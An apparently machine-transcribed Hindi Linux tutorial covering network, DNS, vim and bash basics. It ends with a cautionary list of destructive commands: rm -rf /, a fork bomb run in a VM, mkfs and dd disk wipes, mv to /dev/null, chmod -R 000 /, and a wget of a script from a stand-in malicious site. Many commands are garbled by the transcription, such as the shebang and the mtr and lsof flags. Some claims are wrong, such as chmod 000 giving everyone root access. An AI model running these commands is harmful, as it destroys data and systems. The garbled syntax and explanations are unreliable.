एक बॉक्स के हिसाब से, विच मीन्स लाइक मैपिंग्स योर बॉक्स हैज़ लर्न फॉर, ओके, लोकल लेयर टू नेबर्स, ओके। समझ लीजिए एक फ़ोन बुक में जो मैप करता है होम एड्रेसेस को, ठीक है, हाउस एड्रेसेस को टू अ बेल कोड मैक एड्रेस, ठीक है। अब मुझे चेक करना है कि कोई डोमेन एक्टिव है कि नहीं, अप है कि नहीं, तो मैं पिंग यूज़ करूँगा, पिंग कमांड से मैं चेक कर लूँगा कि वो अप है कि नहीं। और ifconfig कमांड था, वो भी IP एड्रेस कमांड जैसा ही है, ठीक है। ओल्ड वे है, ओल्ड टूल दैट सेज नेटवर्क इंटरफेस का डिटेल देता है ओल्ड वे में, ठीक है। उसकी जगह हम लोग अभी IPA कमांड यूज़ कर सकते हैं, ठीक है। अब और क्या कमांड है, mtrrwexample.com, ठीक है। ये क्या करता है, mtr कंबाइंस ट्रेस रूट प्लस पिंग, ठीक है। MTR कंबाइन करता है ट्रेस रूट और पिंग को, कि कैसे काम करेगा, ट्रेस रूट और पिंग जैसे काम करता है वैसे ही MTR काम करता है। यहाँ पे RW फ्लैग है जो रिपोर्ट मोड और वाइड आउटपुट को देता है।
अब हम लोग अगर एस टर्न का यूज़ करेंगे तो यहाँ पे एस टर्न लिसन करता है, सो लिसनिंग टीसीपी यूडीपी सॉकेट्स। ये टीसीपी यूडीपी सॉकेट्स को शो करता है कहाँ लिसन हो रहा है, न्यूमेरिक एड्रेसेस, अगर नो नेम रेजोल्यूशन है लाइक दैट, ठीक है। टी यहाँ पे टीसीपी स्मॉल टी से होता है और यहाँ पे पी है वो, ठीक है। यहाँ पे टीपी जो है वो शो करता है टीसीपी सॉकेट्स एंड प्रोसेसेस को, ठीक है। पी स्टैंड्स फॉर प्रोसेसेस, ओके। और अगर हम यहाँ पे SS-5 कर देंगे या SS-S कर देंगे, सॉरी एस करेंगे, तो ये समरी देगा सॉकेट यूजेज का, टोटल क्विक ओवरव्यू ऑफ सॉकेट, ठीक है, टोटल दे देगा, ठीक है। यहाँ पे 673 आप देख सकते हैं। अगर मैं नेट स्टैट ट्यूलिप ऐसे करके एक कमांड है, वो ओल्डर टूल है, ठीक है, सिमिलर टू SS, ये SS के सिमिलर है बट ओल्डर है, ठीक है, नेट स्टैट। ये शो करता है TCP UDP लिसनिंग सॉकेट्स को विथ PID प्रोग्राम, ओके। मैनी डिस्ट्रोज नाउ प्रेफर SS एज इट्स फास्टर। नेट स्टैट को नहीं यूज़ करके बहुत सारे डिस्ट्रो अभी SS यूज़ करते हैं, ठीक है, ये आप याद रखिएगा SS कमांड को। अब sudo lsofi port 80 ये शो करता है लिस्ट ओपन फाइल्स फॉर नेटवर्क कनेक्शन ऑन पोर्ट 80, ठीक है, ये आप समझ लीजिए, ठीक है। टेल विच प्रोसेस इज यूजिंग पोर्ट 80, कौन सा प्रोसेस पोर्ट 80 बेसिकली यूज़ कर रहा है, ये उसको शो करेगा, ठीक है। और अगर मैं lsof-i TCP लिसन करूँगा, ये प्रोसेसेस शो करता है जो TCP सॉकेट्स लिसन कर रहा है, कौन से स्टेट में, कौन इनकमिंग वेट कर रहा है, वेटिंग फॉर इनकमिंग TCP कनेक्शन, कौन वेट कर रहा है, ठीक है, TCP कनेक्शन के लिए। जो यहाँ पे आई हम लोग यूज़ कर रहे हैं लोअर केस में, नॉट बिगर केस, ठीक है, यहाँ पे आपको याद रखना है। अब डिग कमांड होता है, जो डिग हम लोग यूज़ करेंगे वो DNS लुकअप्स के लिए यूज़ होता है, रिसॉल्वर टूल, ये सब DNS लुकअप के लिए है। अगर मैं dig example.com प्लस सॉर्ट अगर करूँगा, ये DNS से आस्क करता है फॉर रिकॉर्ड, ठीक है, एक रिकॉर्ड के बारे में example.com का। अब ये इसको प्रिंट करेगा एक आंसर के फॉर्म में सॉर्ट, ठीक है, ये सॉर्ट करके इसको प्रिंट करेगा, ठीक है। तो इसके हिसाब से आप देख सकते हैं। बेसिकली अ रिकॉर्ड IPv4 एड्रेस ऑफ example.com एंड प्रिंट जस्ट द आंसर प्लस सॉर्ट, ओके। सो दिस इज़ द बेसिक गोल, ये इसी का यही गोल है, ठीक है। अब हम लोग यहाँ पे अगर dig mx example.com यूज़ करेंगे तो ये क्या करता है, mx मेल एक्सचेंज होता है, ठीक है। मेल एक्सचेंज रिकॉर्ड्स विच मेल सर्वर, कौन से मेल सर्वर हैंडल कर रहा है ईमेल को फॉर द डोमेन, ठीक है। प्रिंट कंसाइज आंसर्स लाइक इट शोज द मेल सर्वर एंड ऑल, मेल एक्सचेंज इसका mx फुल फॉर्म है। अब अगर dig@1.1.1.1 कर रहे हैं और example.com कर रहे हैं, तो यहाँ पे क्या होगा, ये DNS से आस्क करेगा क्लाउडफ्लेयर के जो IP है फॉर एनी रिकॉर्ड्स, ओके, ये रिकॉर्ड के लिए उसे आस्क करेगा, ठीक है। बहुत सारे पब्लिक DNS सर्वर बेसिकली रिस्ट्रिक्ट करते हैं फुल्ली क्वेरी को आंसर नहीं करने के लिए, ठीक है, फॉर सिक्योरिटी स्पैम रीजंस ये रेस्ट्रिक्टेड है। अब इस पर और डिटेल आप अगर जानना है तो आप -h करके इसके बारे में आप देख सकते हैं, ठीक है, इस कमांड्स के बारे में, और आप इसको और भी डिटेल में पढ़ सकते हैं, ठीक है। रिसॉल्व CTL स्टेटस, तो रिसॉल्व CTL स्टेटस ये मेरे पास इंस्टॉल्ड नहीं है तो मैं इसको दिखा नहीं पाऊँगा, लेकिन ये जो काम करता है ये बेसिकली शो करता है सिस्टम रिसॉल्व DNS रिसॉल्वर को, ओके। इसका स्टेटस शो करता है कि सिस्टम यूज़ कर रहा है कि नहीं DNS रिसॉल्वर। इट टेल्स बेसिकली यू विच DNS सर्वर आर बीइंग यूज्ड, ओके। ये शो करता है, बोलता है कौन सा DNS सर्वर यूज़ हो रहा है एज पर द लिंक एंड कैचिंग स्टेट, ओके। अब यहाँ पे num CLI dev show grep -i DNS, यहाँ पे -i बिगर है, ये शो करता है, प्रिंट करता है नेटवर्क मैनेजर डिवाइसेस डिटेल, ओके। यहाँ पे हम लोग ग्रेप किए हैं, जो केस सेंसिटिव है उसे हम लोग फिल्टर करके लाइन में ये DNS को शो करेगा, ठीक है। शोज प्रिंट्स नेटवर्क मैनेजर डिवाइसेस, ठीक है। आप इस कमांड्स के बारे में -h करके और पढ़ सकते हैं, ठीक है। अब समझ लीजिए हम लोग यहाँ पे कमांड जो यूज़ कर रहे हैं वो echo है, वो echo 10.10.10 test.local, ओके।
यहाँ पे हम लोग सूडो यूज़ कर रहे हैं क्योंकि ये ट्रिक करेगा इको को ठीक से काम करने के लिए, परमिशन डिनाई नहीं होगा, ठीक है, ये फेल नहीं करेगा, ठीक है। और यहाँ पे कमांड है ये सिस्टम फाइल इज़ स्लैश एक्सेट्रा स्लैश होस्ट, ओके। ये सेफली एडिट करने के लिए सेल को कि क्या है स्लैश एक्सेट्रा स्लैश होस्ट में, एडिटिंग स्लैश एक्सेट्रा स्लैश होस्ट सेफली फ्रॉम द सेल, हम लोग सेल से एडिट कर रहे हैं उसे, ठीक है। तो ये उसके लिए यूज़ होता है। अब हम लोग को अलग अगर हम लोग को अपेंड करना है, ठीक है, इसमें तो ये क्या करता है, एक स्टिकी नोट देता है फ़ोन बुक में, समझ लीजिए कंप्यूटर नोज दैट टेस्ट डॉट लोकल, ओके, 10.10.10.10, ओके, लाइक दैट। अब HTTP हेडर एंड डाउनलोड्स, ठीक है, कर्ल कमांड का यूज़ होता है टू मेक अ हेड रिक्वेस्ट, ठीक है। यहाँ पे वो शो करता है रिस्पॉन्स को हेडर में ओनली, ठीक है, नो बॉडी ओनली हेडर्स, ओके। इट इज़ ग्रेट फॉर चेकिंग सर्वर रिस्पॉन्स कोड्स, ओके, लाइक सर्वर का रिस्पॉन्स क्या आ रहा है, 200, 301, 404 एक्सेट्रा, तो कर्ल उसके लिए यूज़ होता है, ठीक है। और सिमिलर वे में यहाँ पे wget है जो शो करता है व्हाट इट डज डाउनलोड इज़ द URL, बेसिकली ये डाउनलोड करता है URL को, ठीक है। तो ये क्या करेगा, ये फाइल नेम शो करेगा। अगर यहाँ पे 404 नॉट फाउंड शो हो रहा है, ये इसका मतलब है कि सर्वर शो कर रहा है, बोलना चाह रहा है कि वो फाइंड नहीं कर पा रहा है, ठीक है, फाइल को। अगर मैं यहाँ पे दे रहा हूँ अगर कमांड वो, ठीक है, wget का, ये क्या करता है wget, बेसिकली इफ इट्स देयर इज़ अ फाइल नेम, देयर इज़ एन साइट, ओके, आई वांट टू डाउनलोड द URL, ठीक है, ये डाउनलोड करने के लिए यूज़ हो सकता है, ठीक। अब यहाँ पे एरर भी आ रहा है, तो इसका मतलब है कि वो कहना चाह रहा है URL और पाथ मिस टाइप्ड है, कुछ गलत है, और फाइल मूव हो गया है, डिलीट हो गया है। IP है जो सर्वर का, वो डायरेक्टली ओपन नहीं कर पा रहा है स्पेसिफिक होस्ट को, हेडर को वर्चुअल होस्ट चाहिए, कुछ ऐसा प्रॉब्लम हो सकता है, तो इसके कारण वहाँ पे एरर आ रहा है। तो ये आपको समझना पड़ेगा, जैसे जैसे आप यूज़ करेंगे ये सब कॉम्प्लेक्स कमांड्स आपको समझ में आते जाएगा। SSH से क्या होता है, आप रिमोट एक्सेस ले सकते हैं किसी भी मशीन का वाया SSH, रिमोट टर्मिनल। ये आपको पासवर्ड पूछेगा, पहले आपको येस करने के लिए बोलेगा कि आप एक्सेस लेना चाहते हैं, रिमोट एक्सेस करना चाहते हैं किसी भी डिवाइस को जो सेम नेटवर्क में, तब आपको पासवर्ड पूछेगा उस डिवाइस का, आप एक्सेस कर सकते हैं। ये भी एक बहुत बड़ा चीज़ है, आपको समझ में आना चाहिए अच्छे से, ठीक है। तो यहाँ पे हम लोग यूज़ कर रहे हैं IWDev, जो है वायरलेस डिवाइसेस को इंटरफेस को शो करने के लिए, लिस्ट करने के लिए, ठीक है। पार्ट ऑफ IW/NL8021, ओके, ये उसका पार्ट है। और NMCLI डिवाइस वाईफाई लिस्ट, ओके, ये वाईफाई लिस्ट कर देगा जो डिवाइसेस है अभी वाईफाई जो शो कर रहा है डिवाइसेस को, कौन कौन सा SSID उसका क्या है, मोड है, कौन सा वाईफाई भी है आसपास हमारा, सारा स्कैन करके शो कर देगा यहाँ पे, ठीक है, वाईफाई लिस्ट को। अब हम लोग यहाँ पे ऐसे अगर हम लोग कुछ और यूज़ करेंगे, जैसे वीम यूज़ कर रहे हैं, मैं वीम यूज़ कर रहा हूँ आपको। तो यहाँ पे वीम का क्या काम है कि वीम आपको बेसिकली एक पावरफुल मॉडल टेक्स्ट एडिटर है। अगर आप अंदर जाएंगे तो आपको आई क्लिक करना पड़ेगा, ठीक है। तो यहाँ पे आप कुछ भी एंटर कर अपना टाइप कर सकते हैं, ठीक है। सो बेसिकली वीम इज़ अ पावरफुल मॉडल टेक्स्ट एडिटर, थिंक ऑफ इट लाइक अ स्पेसशिप विथ डिफरेंट कंट्रोल मोड्स, इट इज़ वेरी पावरफुल। बेसिकली पूरा मतलब है कि ये बहुत पावरफुल है, आप इससे कुछ भी कोड कर सकते हैं, ठीक है। नॉर्मल मोड में, इंसर्ट मोड में पहले आपको आई देना पड़ेगा, विजुअल मोड के लिए आप V प्रेस करेंगे तो विजुअल मोड आ जाएगा, ठीक है। अब इसका बहुत सारा कमांड होता है, बेसिक चीट्स होता है, जो इंसर्ट करने के लिए आपको आई करना पड़ेगा, तो आप आई दे सकते हैं। यहाँ पे मैं एक कमांड लिख रहा हूँ, ठीक है। आपको W करने के लिए, सेव करने के लिए W, एंड DD के लिए डिलीट, ऐसे कर सकते हैं। यहाँ पे एक छोटा सा कमांड है जो यहाँ पे पहले स्टार्टिंग है CBang लाइन से, ये OS को बोलता है कौन सा रन करना है स्क्रिप्ट को, ठीक है। ये CBang लाइन है जो /#bin/bash, ओके, इको बेसिकली प्रिंट करता है, ठीक है। मुझे प्रिंट करना है वेलकम टू माय चैनल, ओके, मैं प्रिंट कर रहा हूँ। यहाँ पे फिर मैं एक फॉर लूप ले लिया हूँ, ठीक है। फॉर लूप को मैं कैसे रन कर रहा हूँ, 1 to 10, ओके। यहाँ पे डबल डॉट जो है 1 से 10 तक फॉर लूप को रन करेगा। अ लूप दैट सेट्स टू 1 एंड देन 2 देन अप टू 10, ओके, ये 10 तक जाएगा।
यहाँ पे जो डू है और डन है, डू और डन के बीच में ही रहेगा ये। यहाँ पे लूप का बॉडी है जो एवरीथिंग बिटवीन डू एंड डन, ओके। इटरेशन को ये रन करेगा और यहाँ पे इको नंबर से मैं उसको कॉल कर ले रहा हूँ जो आई है। अब प्रिंट कर रहा हूँ नंबर को 1 देन 2 देन 3 ऐसे प्रिंट होगा। अब ch मोड जो है वो इसको एग्जीक्यूटेबल बनाएगा इस फाइल को, ठीक है। मैं ls करूँगा तो आप देख सकते हैं first.sh फाइल है, ठीक है। ये first.sh फाइल है जो मैं अभी क्रिएट किया हूँ, ठीक है, नैनो से, विम से, बेसिकली विम एडिटर से मैं क्रिएट किया हूँ। आप नैनो से भी कर सकते हैं। अब ये एग्जीक्यूटेबल नहीं है, ये रन नहीं करेगा अभी कुछ भी कोड करने का आपको रन करना है वो तो रन नहीं करेगा अभी। पहले कैसे रन करेगा बैश फाइल, इसको आप एग्जीक्यूटेबल बनाएंगे तभी रन करेगा। तो एग्जीक्यूटेबल बनाने के लिए ch मोड का यूज़ कर सकते हैं, +x first.sh, ओके। और बैश अगर आप लिखेंगे first.sh तो ये रन करेगा, और ./first.sh करके भी ये रन करेगा, ठीक है। तो ये बहुत सिंपल चीज़ था, ये आपको मालूम रहना चाहिए। सो गाइस, अब मैं आपको दिखाने वाला हूँ कुछ ऐसे कमांड्स जो आपको कभी यूज़ नहीं करने चाहिए, ठीक है। अगर आप इस कमांड्स को यूज़ करेंगे तो आपका सिस्टम कभी भी क्रैश कर सकता है, रीस्टार्ट हो सकता है और कुछ भी डाटा वाइप हो सकता है। पहले हम लोग देखेंगे यूज़ केस जो है RMRF का। ये कमांड आपको कभी यूज़ नहीं करना है। अगर कोई यूज़ भी कर रहा है आपका फ्रेंड तो उसे रोक देना है, ठीक है। ये कमांड क्या करेगा, पूरा डिलीट कर देता है सब चीज़ फ्रॉम रूट फोल्डर, ओके। ये आस्क भी नहीं करता है, सब कुछ पूरा डिलीट, ओके। तो मैं इसको यूज़ नहीं कर रहा हूँ, मैं बेसिकली इस पर्पस के लिए वर्चुअल बॉक्स में दिखा रहा हूँ हाइपरवाइजर में कि ये कैसे यूज़ होता है, कैसे इसका यूज़ कैसे मैन पेजेस से, ठीक है। मैं इसको यूज़ नहीं किया, ये यूज़ करना बहुत ही ख़तरनाक है एज इन लिनक्स, ओके। यूबुंटू डेबियन हो या काली हो, इसमें यूज़ नहीं करना है, ठीक है। अब क्या है, ये फॉर्क बॉम्बिंग है, ठीक है। फॉर्क बॉम्ब इज़ लाइक टेलिंग की कॉपी करते रहता है ये, ठीक है। अब किसी भी चीज़ को ये क्या करता है, प्रोसेस से इतना हाई कर देता है कि सिस्टम क्रैश कर देता है। और मैं यहाँ पे यूज़ करता हूँ, एक बार देखते हैं क्या होता है इसका, ठीक है। ये सिस्टम को क्रैश कर देगा, हार्ड रीसेट करना पड़ेगा सिस्टम को, लास्ट में यही एक सोल्यूशन बचता है, ठीक है। ये हो गया, ठीक है। अब देखिए यहाँ पे मैं कट करूँगा अगर इस टर्मिनल को या हटने की कोशिश करूँगा यहाँ से तो ये हटेगा नहीं, ठीक है। ये पूरा क्रैश हो चुका है, सिस्टम अपने आप को कॉपी करते जा रहा है प्रोसेस को, एक प्रोसेस को बार बार कॉपी कर करके आगे कर रहा है और बढ़ा रहा है इस प्रोसेस को। इससे क्या होगा, आपका सिस्टम बहुत ओवरलोड हो जाएगा, इसके कारण आपका सिस्टम क्रैश कर जा सकता है। देखिए यहाँ पे क्रॉस बटन भी काम नहीं कर रहा है, एक ही सिचुएशन बचता है यहाँ पे रीस्टार्ट करने का। तो मैं तो एक हाइपरवाइजर में हूँ तो मैं यहाँ पे पावर ऑफ करके ऑन करूँगा तो ये फिक्स हो जाएगा। बट ये दिखाने लायक था, मैं तो दिखा दिया। ये भी एक बहुत बड़ा फॉर्क बॉम्ब है इसका नाम इस कमांड का, तो ये भी आपको यूज़ नहीं करना है, ठीक है। सो अब हम लोग यूज़ करेंगे, यहाँ पे देखेंगे यूज़ केस mkfs.ext4/dev/sda। इस कमांड का यूज़ होता है हार्ड ड्राइव को इरेज करने के लिए, ठीक है। और चॉक बोर्ड और हार्ड, सपोज लाइक एक चॉक बोर्ड है, उसको हम लोग इरेज कर दिए, पूरा सब कुछ फिनिश हो गया वहाँ से। वैसे ही इस कमांड को भी होता है, एक हार्ड ड्राइव हो या कुछ भी उसका पर्टिकुलर डाटा को रिमूव करने के लिए, ठीक है। फुल्ली ये वाइप आउट कर देगा, ठीक। यहाँ पे आप मैन पेजेस में आप इसके बारे में पढ़ सकते हैं, ठीक है। और हेल्प कमांड से भी आप इसे पढ़ सकते हैं, ठीक है। आपको ये यूज़ नहीं करना है, ये सब कमांड्स को आपको यूज़ नहीं करना है, बार बार मैं बोल रहा हूँ, ठीक है। तो ये इसको आपको याद रखना पड़ेगा कि ये अगर कमांड्स आए तो कभी यूज़ नहीं करने के लिए, ठीक है। और कोई भी अगर यूज़ करे आपके सिस्टम में तो आपको रोक देना है उसे, ठीक है। ये सिस्टम आपको करप्ट कर देगा, ठीक है, कुछ भी आपके डाटा को वाइप आउट कर देगा। और सेकेंड, फोर्थली इज dd if equal to /dev/0 स्पेस ऑफ इक्वल टू /dev/sda। अब ये कमांड जो है ये भी बहुत अपने में ही बहुत ख़तरनाक है। ये क्या है, ज़ीरो बेसिकली होल डिस्क को ये परमानेंट वाइप कर देता है, इसका कुछ भी ट्रेस नहीं मिलेगा, ठीक है। ये रिस्टोर भी नहीं हो सकता है। पहले वाला था कि वाइप हुआ अगर फिर रिस्टोर कर सकते हैं, बट ये तो परमानेंट वाइप आउट है कि ये पूरा मतलब कुछ रिसाइकल बिन में भी रहेगा, मतलब ये पूरा डिलीट, ठीक है। कुछ आपको उसका बैकअप कुछ नहीं मिलेगा, हो सकता है, ठीक है। ये परमानेंट वाइप आउट के लिए ये कमांड यूज़ होता है, तो इसे आप यूज़ मत करिएगा, ठीक है। आप इस मैनुअल पेजेस में पढ़ सकते हैं, यूज़ करके आप इसको देख नहीं सकते, यूज़ कर सकते हैं। आपको करना है तो वर्चुअल बॉक्स में या कोई भी हाइपरवाइजर में आप इसको यूज़ करके टेस्ट करके देख सकते हैं, सैंड बॉक्स इन्वायरमेंट में, ठीक है, या डॉकर में, ठीक है। आप इसे वहाँ पर देख सकते हैं, बट यहाँ पर आपका मेन ओएस में कभी मेन सिस्टम में बस मत इसे यूज़ करिएगा, ठीक है।
अभी ये कमांड है mb स्पेस स्लैश dev स्लैश null। ओके, ये क्या करता है, सब कुछ जो भी फोल्डर फाइल है उसे एक ब्लैक होल फोल्डर में भेज देता है। इससे क्या होगा, जो भी आपका डाटा है वो डिसअपेयर हो जाएगा, फिर वो उस फोल्डर में ही चला जाएगा, उस नल फोल्डर में, वो आपको मिलेगा नहीं। ठीक है, तो यहाँ पे आप उसको देख सकते हैं, MB का बहुत सारा मैनुअल पेजेस में आ गया है, man करके। ठीक है, MB के बारे में जानने के लिए आप हेल्प कर सकते हैं, हेल्प कमांड का यूज़ कर सकते हैं, तो उससे आप इसे और जानकारी मिलेगा। ठीक है, आपका सिस्टम इससे पूरा मतलब गॉन हो जाएगा, कुछ फोल्डर फाइल सब कहाँ चला गया, मतलब कुछ यूज़लेस, आपका सिस्टम कुछ बचेगा नहीं यूज़ करने लायक। ठीक है, अगर मैं हेल्प करूँगा, यहाँ पे हेल्प कमांड का यूज़ लूँगा, तो यहाँ पे मुझे पता चलेगा कि इसका क्या यूज़ केस है और ये कैसे यूज़ कर सकते हैं हम लोग। ठीक है, तो हेल्प कमांड यहाँ पे बताएगा डेस्टिनेशन और रिप्लेस एंड स्क्रिप्ट फाइल्स डू नॉट इंक्लूड बीइंग रिप्लेस। ओके, डेस्टिनेशन और रिप्लेस ऑल डिफॉल्ट ऑपरेशंस व्हेन एन अपडेट ऑप्शन इज़ नॉट स्पेसिफाइड एंड रिजल्ट्स आर लाइक। सो यहाँ पे आप इसे रीड कर सकते हैं। ठीक है, अकॉर्डिंगली। तो होपफुली आपको समझ आ रहा होगा। ठीक है, अब नेक्स्ट कमांड है chmod। ये सब आपको यूज़ नहीं करना है, मैं आपको इसलिए बता रहा हूँ प्रिकॉशन के लिए। ठीक है, कि chmod-r000/। ओके, ये सारा परमिशन को रिमूव कर देगा आपका। ठीक है, फॉर एवरी फाइल, सो एनीवन कैन एक्सेस एनीथिंग। ठीक है, ये सारा परमिशन हटा देगा, मीन्स रूट यूज़र और नॉर्मल यूज़र के बीच में कोई डिफरेंस नहीं रहेगा। सब कोई कुछ भी रूट यूज़र का जो प्रिविलेज था वो एक नॉर्मल यूज़र को भी मिल जाएगा। ठीक है, तो ये एक प्रॉब्लम है। ठीक है, इसे भी आपको देख के नहीं यूज़ करना है। ठीक है, यहाँ पे wget malicious.site-script.sh ये रैंडम स्क्रिप्ट है जो इंटरनेट से डाउनलोड हो जाएगा और रन हो जाएगा इमिडिएटली। इससे क्या होगा, बहुत सारे हैकर्स को और पीसी को आपके मैनिपुलेट और वल्नरेबिलिटी क्रिएट करने के लिए काफ़ी है। आपका हैकर कोई भी एक्सेस कर सकता है पीसी। अगर ये रन हो गया मेलवेयर, तो एक लिनक्स के लिए ये बहुत ही डेडली चीज़ है। ठीक है, तो इसे भी आप याद रखिए, कभी भी रीयूज़ नहीं करने के लिए, यूज़ करना है तो एक वर्चुअल प्लेटफॉर्म में, एक हाइपरवाइजर प्लेटफॉर्म, सैंडबॉक्स प्लेटफॉर्म में यूज़ करिए, बट ऐसे कभी मत यूज़ करिए। ठीक है, और अगर आपको यहाँ पर अब जैसे कि समझना है, जैसे कि कौन सा कमांड कैसे यूज़ किया जाए, जैसे हाउ टू सेफली लर्न वेरियस कमांड्स। ओके, यहाँ पे बहुत सारे कमांड है लिनक्स में, आपको समझ में नहीं आएगा तो आप यूज़ कर सकते हैं मैन कमांड्स का। ठीक है, मैन होता है जैसे कि मैन ls, मैनुअल पेजेस को शो करता है। ठीक है, मैन ls किया तो ls के बारे में जितना कमांड है, ls के टाइप्स सब कुछ लिस्ट हो जाएंगे, मैं ls के बारे में सब कुछ पता चल जाएगा मुझे। वैसे यहाँ पे हेल्प कमांड होता है जो ls के बारे में सब कुछ क्लियर कर देता है हमें कि ls का क्या यूज़ केस है, हेल्प कैसे हम लोग उसको यूज़ कर सकते हैं। ठीक है, ये पूरा लिस्ट कर देता है। ठीक, क्विक एक्सप्लेनेशन दे देता है हेल्प कमांड से। ठीक है, मैनुअल पेजेस के मदद से हाउ हम लोग कैसे यूज़ कर सकते हैं उसको, वो पता चल जाता है। यहाँ पे TLDR भी वैसा ही है, ये लॉन्ग फॉर्मेट में हम लोग को डिस्क्रिप्शन देता है। ठीक है, ये सब कुछ कमांड्स है जो आपको याद रखना चाहिए। अगर कोई कमांड ऐसा आ गया जो आपको दिमाग में नहीं है और समझ में नहीं आ रहा है उसके पार्ट, बट आपको उसके पार्ट पता है, तो आप उसको यूज़ कर सकते हैं। मैनुअल पेजेस को, हेल्प कमांड को, TLDR यूज़ करके आप उसके बारे में पता लगा सकते हैं। ठीक है, एप्रोपॉस भी है, आप उसको भी यूज़ कर सकते हैं। ठीक है, तो ये सब कुछ कमांड्स हैं आपको, जैसे कि यहाँ पे echo rm-rf करके, तो ये पूछेगा कि मैं रन करूँ कि नहीं इसे, तो आपको इससे पता चल जाएगा। ठीक है, ये क्या है, ऐसे करके आप मतलब देख सकते हैं कि क्या करना चाहिए मुझे। तो इसके लिए मैं आपको 2-3 तरीके बता दिया कि किसी भी कमांड के बारे में जानकारी चाहिए तो मैन, हेल्प, एप्रोपॉस, TLDR ये सब आप यूज़ कर सकते हैं। तो अगर कुछ न्यू जानने को मिला हो तो लाइक एंड सब्सक्राइब करिए। मिलते हैं एक और न्यू वीडियो में। टिल देन बाय।